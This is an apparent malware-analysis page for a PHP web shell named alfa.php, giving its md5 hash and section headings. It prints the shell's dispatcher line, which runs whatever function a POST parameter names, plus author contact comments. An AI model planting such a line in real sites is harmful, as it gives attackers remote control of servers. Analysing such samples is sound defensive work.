call_user_func('alfa' . $_POST['a']);
exit;
/*
#Persian Gulf For Ever
#skype : sole.sad
#skype : ehsan.invisible
*/
PHP Malware Analysis

alfa.php

md5: 4d7f82f090ea7340e9de8a80eba94bff

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
